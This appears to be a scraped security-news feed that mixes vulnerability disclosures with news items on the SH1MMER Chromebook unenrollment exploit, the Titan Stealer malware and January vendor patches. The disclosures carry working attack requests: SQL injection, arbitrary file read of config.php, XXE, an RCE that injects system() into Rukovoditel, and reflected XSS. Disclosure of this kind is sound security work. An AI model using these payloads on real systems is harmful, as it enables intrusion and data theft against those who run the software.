Online Eyewear Shop version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Online Eyewear Shop 1.0 - Product detail 'id' SQL Injection (Unauthenticated)# Date: 2023-01-02# Exploit Author: Muhammad Navaid Zafar Ansari# Vendor Homepage: https://www.sourcecodester.com/php/16089/online-eyewear-shop-website-using-php-and-mysql-free-download.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-oews.zip# Version: 1.0# Tested on: Kali Linux + PHP 8.2.1, Apache 2.4.55 (Debian)# CVE: Not Assigned Yet# References: -------------------------------------------------------------------------------------1. Description:----------------------Online Eyewear Shop 1.0 allows Unauthenticated SQL Injection via parameter 'id' in 'oews/?p=products/view_product&id=?'  Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.2. Proof of Concept:----------------------Step 1 - By visiting the url: http://localhost/oews/?p=products/view_product&id=5 just add single quote to verify the SQL Injection.Step 2 - Run sqlmap -u "http://localhost/oews/?p=products/view_product&id=3" -p id --dbms=mysqlSQLMap Response:[*] starting @ 04:49:58 /2023-02-01/[04:49:58] [INFO] testing connection to the target URLyou have not declared cookie(s), while server wants to set its own ('PHPSESSID=ft4vh3vs87t...s4nu5kh7ik'). Do you want to use those [Y/n] nsqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: p=products/view_product&id=3' AND 4759=4759 AND 'oKly'='oKly    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: p=products/view_product&id=3' AND (SELECT 5509 FROM (SELECT(SLEEP(5)))KaYM) AND 'phDK'='phDK---[04:50:00] [INFO] testing MySQL[04:50:00] [INFO] confirming MySQL[04:50:00] [INFO] the back-end DBMS is MySQLweb server operating system: Linux Debianweb application technology: Apache 2.4.55, PHPback-end DBMS: MySQL >= 5.0.0 (MariaDB fork)3. Example payload:----------------------(boolean-based)' AND 1=1 AND 'test'='test4. Burpsuite request:----------------------GET /oews/?p=products/view_product&id=5%27+and+0+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,version(),14--+- HTTP/1.1Host: localhostsec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=g491mrrn2ntmqa9akheqr3ujipConnection: close

Online Eyewear Shop 1.0 SQL Injection

A new exploit has been devised to "unenroll" enterprise- or school-managed Chromebooks from administrative control.
Enrolling ChromeOS devices makes it possible to enforce device policies as set by the organization via the Google Admin console, including the features that are available to users.
"Each enrolled device complies with the policies you set until you wipe or deprovision it," Google

A new exploit has been devised to "unenroll" enterprise- or school-managed Chromebooks from administrative control.

Enrolling ChromeOS devices makes it possible to enforce device policies as set by the organization via the Google Admin console, including the features that are available to users.

"Each enrolled device complies with the policies you set until you wipe or deprovision it," Google states in its documentation.

That's where the exploit – dubbed Shady Hacking 1nstrument Makes Machine Enrollment Retreat aka **SH1MMER** – comes in, allowing users to bypass these admin restrictions.

The method is also a reference to shim, a Return Merchandise Authorization (RMA) disk image used by service center technicians to reinstall the operating system and run diagnosis and repair programs.

The Google-signed shim image is a "combination of existing Chrome OS factory bundle components" – namely a release image, a toolkit, and the firmware, among others – that can be flashed to a USB drive.

A Chromebook can then be booted in developer mode with the drive image to invoke the recovery options. A shim image can either be universal or specific to a Chromebook board.

SH1MMER takes advantage of a modified RMA shim image to create a recovery media for the Chromebook and writes it to a USB stick. Doing so requires an online builder to download the patched version of the RMA shim with the exploit.

The next step entails launching the recovery mode on the Chromebook and plugging the USB stick containing the image into the device to display an altered recovery menu that enables users to completely unenroll the machine.

"It will now behave entirely as if it is a personal computer and no longer contain spyware or blocker extensions," the Mercury Workshop team, which came up with the exploit, said.

"RMA shims are a factory tool allowing certain authorization functions to be signed, but only the KERNEL partitions are checked for signatures by the firmware," the team further elaborated. "We can edit the other partitions to our will as long as we remove the forced readonly bit on them."

Additionally, the SH1MMER menu can be used to re-enroll the device, enable USB boot, open a bash shell, and even allow root-level access to the ChromeOS operating system.

The Hacker News has reached out to Google for comment, and we will update the story if we hear back.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New SH1MMER Exploit for Chromebook Unenrolls Managed ChromeOS Devices

Forget Heart Message Box v1.1 was discovered to contain a SQL injection vulnerability via the name parameter at /cha.php.

**Forget Heart Message Box 1.1 has multiple SQL injections****Vulnerability Type :**

SQL Injection

**Vulnerability Version :**

1.1

**Recurring environment:**

*   Windows 10
*   PHP 7.3.4
*   Apache 2.4.43

**Vulnerability Description AND recurrence:**

Vulnerability Documentation：_adminpost.php_

Parameter: name

POST /admin/loginpost.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://192.168.2.101/
Cookie: PHPSESSID=28s17sili7ldmc68goe212s593
Content-Length: 29
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Host: 192.168.2.101
Connection: Keep-alive

login=&name=1232\*&pass=123456

  

Vulnerability Documentation：_cha.php_

Parameter: name

POST /cha.php HTTP/1.1
Host: 192.168.2.24
Content-Length: 57
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.2.24
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.2.24/cha.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=qhndee8uhjmf0g0nrul6nmcurs
Connection: close

name=1\*&go=%E6%9F%A5%E8%AF%A2%E7%95%99%E8%A8%80

**Restoration suggestions**

Filtering of user input or using magic methods.

CVE-2023-24956: Forget Heart Message Box 1.1 has multiple SQL injections · Issue #1 · Mortalwangxin/lives

Easy Images v2.0 was discovered to contain an arbitrary file download vulnerability via the component /application/down.php. This vulnerability is exploited via a crafted GET request.

**EasyImages2.0-arbitrary-file-download-vulnerability****Found on: 2022-12-27****Impact version**

EasyImages2.0 ≤ v2.6.7

**Analysis Report：**

_Vulnerability path: /application/down.php_

payload：

GET /application/down.php?dw=config/config.php HTTP/1.1
Host: 192.168.2.13
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm\_lvt\_c790ac2bdc2f385757ecd0183206108d=1672116632; Hm\_lpvt\_c790ac2bdc2f385757ecd0183206108d=1672149755
Connection: close

You can download any file in the host by passing the dw parameter to the get request

**Fixes**

Specify the download directory to download only for the specified directory, other directories are filtered and requests are rejected.

CVE-2022-48161: GitHub - sunset-move/EasyImages2.0-arbitrary-file-download-vulnerability: EasyImages2.0 arbitrary file download vulnerability

Netcad KEOS 1.0 is vulnerable to XML External Entity (XXE) resulting in SSRF with XXE (remote).

**Exploit Title: CVE-2022-47873 KEOS Software XXE****Exploit Author: Ömer Akincir****Team: Ömer Yılmaz****Version: 1.0 >=****Vuln Details: XXE****Description:**

KEOS application running on the web is vulnerable to XML External Entity (XXE) attack.

**Impact:**

An attacker can trigger SSRF over XXE using Proof Of Concept.

**PoC:**

    POST /KEOS/ HTTP/1.1
    Host:
    Content-Type: application/xml
    Soapaction: ""
    Content-Length: 160
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Encoding: gzip,deflate,br
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36
    
    <?xml version="1.0" encoding="utf-8"?>
    
      <!DOCTYPE roottag PUBLIC "-//A//B//EN" "http://BURP-COLLOBRATOR-URL">
    
      <roottag>test</roottag>
    

Ref: https://github.com/waspthebughunter/CVE-2022-47873

CVE-2022-47873: CVE-2022-47873 KEOS Software XXE - Fordefence - Adli Bilişim Laboratuvarı

January saw a slew of security patches for iOS, Chrome, Windows, and more.

The Android security patch is available to Google’s Pixel devices, which have their own specific updates, and Samsung’s Galaxy range, including Samsung Galaxy Note 10, Galaxy S21, and Galaxy A73. You can check for the update in your settings.

Microsoft Patch Tuesday

Microsoft fixed a rather hefty 98 security issues in its first Patch Tuesday of the year, including an already exploited vulnerability: CVE-2023-21674 is an elevation of privilege flaw impacting the Windows Advanced Local Procedure Call that could lead to browser sandbox escape. 

By exploiting the bug, an adversary could gain System privileges, Microsoft wrote, confirming that the flaw has been detected in real-life attacks.

Another elevation of privilege vulnerability in the Windows Credential Manager User Interface, CVE-2023-21726, is relatively easy to exploit and doesn’t require any interaction from the user.

January’s Patch Tuesday also saw Microsoft fix nine Windows Kernel vulnerabilities, eight of which are elevation of privilege issues and one information disclosure vulnerability.

Mozilla Firefox

Software firm Mozilla has released important updates for its Firefox browser, the most serious of which have been the subject of a warning by the US Cybersecurity and Infrastructure Security Agency (CISA). 

Among the 11 flaws fixed in Firefox 109 are four rated as having a high impact, including CVE-2023-23597, a logic bug in process allocation that could allow adversaries to read arbitrary files. Meanwhile, Mozilla said its security team found memory safety bugs in Firefox 108. “Some of these bugs showed evidence of memory corruption and we presume that with enough effort, some could have been exploited to run arbitrary code,” it wrote.

An attacker could exploit some of these vulnerabilities to take control of an affected system, CISA said in its advisory. “CISA encourages users and administrators to review Mozilla’s security advisories for Firefox ESR 102.7 and Firefox 109 for more information and apply the necessary updates.”

VMWare

Enterprise software maker VMWare has published a security advisory detailing four flaws affecting its VMware vRealize Log Insight product. Tracked as CVE-2022-31706, the first is a directory traversal vulnerability with a CVSSv3 base score of 9.8. By exploiting the flaw, an unauthenticated, malicious actor could inject files into the operating system of an impacted appliance, resulting in RCE, VMWare says.

Meanwhile, a broken access control RCE vulnerability tracked as CVE-2022-31704 also has a CVCCv3 base score of 9.8. It goes without saying that those impacted by these vulnerabilities should patch as soon as possible.

Oracle

Software giant Oracle has released patches for a whopping 327 security vulnerabilities, 70 of which are rated as having a critical impact. Worryingly, 200 of the issues patched in January can be exploited by a remote unauthenticated attacker.

Oracle is recommending that people update their systems as soon as possible, warning that it has received reports of “attempts to maliciously exploit vulnerabilities for which Oracle has already released security patches.”

In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches, it says.

SAP

SAP’s January Patch Day has seen the release of 12 new and updated security notes. With a CVSS score of 9.0, CVE-2023-0014 is rated as the most severe bug by security firm Onapsis. The flaw affects the majority of all SAP customers and its mitigation is a challenge, Onapsis says. 

The capture-replay vulnerability is a risk because it could allow malicious users to obtain access to an SAP system. “Complete patching of the vulnerability includes applying a kernel patch, an ABAP patch, and a manual migration of all trusted RFC and HTTP destinations,” Onapsis explains.

You Really Need to Update Firefox and Android Right Now

Rukovoditel v3.2.1 was discovered to contain a remote code execution (RCE) vulnerability in the component /rukovoditel/index.php?module=dashboard/ajax_request.

**Rukovoditel v3.2.1 has Remote Code Execution in ajax\_request.php**

Author: y1s3m0

vendors:

*   https://www.rukovoditel.net/
    
*   https://sourceforge.net/projects/rukovoditel/files/latest/download
    

**Payload**

database:rukovoditel

In the latest version of Rukovoditel, there is a remote command execution vulnerability that can be exploited simply by combining it with an SQL injection vulnerability. By executing the following command in the database, you can store the command you need. You just need to focus on "id", "type", and "configuration", and make sure that type="fieldtype\_ajax\_request" and configuration are the PHP command you want to execute.

INSERT INTO \`rukovoditel\`.\`app\_fields\`(\`id\`, \`entities\_id\`, \`forms\_tabs\_id\`, \`comments\_forms\_tabs\_id\`, \`forms\_rows\_position\`, \`type\`, \`name\`, \`short\_name\`, \`is\_heading\`, \`tooltip\`, \`tooltip\_display\_as\`, \`tooltip\_in\_item\_page\`, \`tooltip\_item\_page\`, \`notes\`, \`is\_required\`, \`required\_message\`, \`configuration\`, \`sort\_order\`, \`listing\_status\`, \`listing\_sort\_order\`, \`comments\_status\`, \`comments\_sort\_order\`) VALUES (999, 23, 28, 0, '', 'fieldtype\_ajax\_request', 'Subject', '', 1, '', '', 0, '', '', 1, '', '{\\"php\_code\\":\\"system(\\\\"whoami\\\\")\\"}', 3, 1, 3, 0, 0);

Then, by obtaining the administrator's "form\_session\_token" and cookie, you can construct a payload similar to the one below and execute the command stored in the database. Make sure that field\_id is the injected id above.

POST /index.php?module\=dashboard/ajax\_request&field\_id\=999 HTTP/1.1
Host: rukovoditel:8082
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh,zh-CN;q=0.9,ja;q=0.8,vi;q=0.7
Content-Length: 35
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: cookie\_test=please\_accept\_for\_session; sid=ecvuqrogd8e5v7jvlqr2mvhj5c; app\_remember\_me=1; app\_stay\_logged=1; app\_remember\_user=YWRtaW4%3D; app\_remember\_pass=JFAkRTRVRnlFMHhGQzYxMlFqWE5KUHJxLzJHck9oUGVTMA%3D%3D; XDEBUG\_SESSION=XDEBUG\_ECLIPSE
DNT: 1
Origin: http://rukovoditel:8082
Referer: http://rukovoditel:8082/index.php?module=custom\_php/code
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
form\_session\_token=ih7agGdyZZ

CVE-2022-48175: vulnfind/rce_ajax_request.md at main · y1s3m0/vulnfind

Zstore version 6.6.0 suffers from a cross site scripting vulnerability.

    ## Title: zstore-6.6.0 - XSS-Reflected## Development: nu11secur1ty## Date: 01.29.2023## Vendor: https://zippy.com.ua/## Software: https://github.com/leon-mbs/zstore/releases/tag/6.5.4## Reproduce: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/zippy/zstore-6.5.4## Description:The value of manual insertion `point 1` is copied into the HTMLdocument as plain text between tags.The payload giflc<img src=a onerror=alert(1)>c0yu0 was submitted inthe manual insertion point 1.This input was echoed unmodified in the application's response.## STATUS: HIGH Vulnerability[+] Exploit:```GETGET /index.php?p=%41%70%70%2f%50%61%67%65%73%2f%43%68%61%74%67%69%66%6c%63%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%77%77%77%2e%79%6f%75%74%75%62%65%2e%63%6f%6d%2f%77%61%74%63%68%3f%76%3d%6d%68%45%76%56%39%51%37%7a%66%45%22%3e%3c%69%6d%67%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%6d%65%64%69%61%2e%74%65%6e%6f%72%2e%63%6f%6d%2f%2d%4b%39%73%48%78%58%41%62%2d%63%41%41%41%41%43%2f%73%68%61%6d%65%2d%6f%6e%2d%79%6f%75%2d%70%61%74%72%69%63%69%61%2e%67%69%66%22%3e%0aHTTP/2Host: store.zippy.com.uaCookie: PHPSESSID=f816ed0ddb0c43828cb387f992ac8521; last_chat_id=439Cache-Control: max-age=0Sec-Ch-Ua: "Chromium";v="107", "Not=A?Brand";v="24"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://store.zippy.com.ua/index.php?q=p:App/Pages/MainAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9```[+] Response:```HTTP/2 200 OKServer: nginxDate: Sun, 29 Jan 2023 07:27:55 GMTContent-Type: text/html; charset=UTF-8Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheX-Ray: p529:0.010/wn19119:0.010/wa19119:D=12546Class \App\Pages\Chatgiflc<ahref="https:\\www.youtube.com\watch?v=mhEvV9Q7zfE"><imgsrc=https:\\media.tenor.com\-K9sHxXAb-cAAAAC\shame-on-you-patricia.gif"> does not exist<br>82<br>/home/zippy00/zippy.com.ua/store/vendor/leon-mbs/zippy/core/webapplication.php<br>```## Proof and Exploit:[href](https://streamable.com/aadj5c)## Reference:[href](https://portswigger.net/kb/issues/00200300_cross-site-scripting-reflected)

Zstore 6.6.0 Cross Site Scripting

A new Golang-based information stealer malware dubbed Titan Stealer is being advertised by threat actors through their Telegram channel.
"The stealer is capable of stealing a variety of information from infected Windows machines, including credential data from browsers and crypto wallets, FTP client details, screenshots, system information, and grabbed files," Uptycs security researchers

Threat Detection / Malware

A new Golang-based information stealer malware dubbed **Titan Stealer** is being advertised by threat actors through their Telegram channel.

"The stealer is capable of stealing a variety of information from infected Windows machines, including credential data from browsers and crypto wallets, FTP client details, screenshots, system information, and grabbed files," Uptycs security researchers Karthickkumar Kathiresan and Shilpesh Trivedi said in a recent report.

Details of the malware were first documented by cybersecurity researcher Will Thomas (@BushidoToken) in November 2022 by querying the IoT search engine Shodan.

Titan is offered as a builder, enabling customers to customize the malware binary to include specific functionalities and the kind of information to be exfiltrated from a victim's machine.

The malware, upon execution, employs a technique known as process hollowing to inject the malicious payload into the memory of a legitimate process known as AppLaunch.exe, which is the Microsoft .NET ClickOnce Launch Utility.

Some of the major web browsers targeted by Titan Stealer include Google Chrome, Mozilla Firefox, Microsoft Edge, Yandex, Opera, Brave, Vivaldi, 7 Star Browser, Iridium Browser, and others. The crypto wallets singled out are Armory, Armory, Bytecoin, Coinomi, Edge Wallet, Ethereum, Exodus, Guarda, Jaxx Liberty, and Zcash.

It's also capable of gathering the list of installed applications on the compromised host and capturing data associated with the Telegram desktop app.

The amassed information is subsequently transmitted to a remote server under the attacker's control as a Base64-encoded archive file. Furthermore, the malware comes with a web panel that enables adversaries to access the stolen data.

The exact modus operandi used to distribute the malware is unclear as yet, but traditionally threat actors have leveraged a number of methods, such as phishing, malicious ads, and cracked software.

"One of the primary reasons \[threat actors\] may be using Golang for their information stealer malware is because it allows them to easily create cross-platform malware that can run on multiple operating systems, such as Windows, Linux, and macOS," Cyble said in its own analysis of Titan Stealer.

"Additionally, the Go compiled binary files are small in size, making them more difficult to detect by security software."

The development arrives a little over two months after SEKOIA detailed another Go-based malware referred to as Aurora Stealer that's being put to use by several criminal actors in their campaigns.

The malware is typically propagated via lookalike websites of popular software, with the same domains actively updated to host trojanized versions of different applications.

It has also been observed taking advantage of a method known as padding to artificially inflate the size of the executables to as much as 260MB by adding random data so as to evade detection by antivirus software.

The findings come close on the heels of a malware campaign that has been observed delivering Raccoon and Vidar using hundreds of fake websites masquerading as legitimate software and games.

Team Cymru, in an analysis published earlier this month, noted that "Vidar operators have split their infrastructure into two parts; one dedicated to their regular customers and the other for the management team, and also potentially premium / important users."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Titan Stealer: A New Golang-Based Information Stealer Malware Emerges

Use after free in WebTransport in Google Chrome prior to 109.0.5414.119 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

Tag

#chrome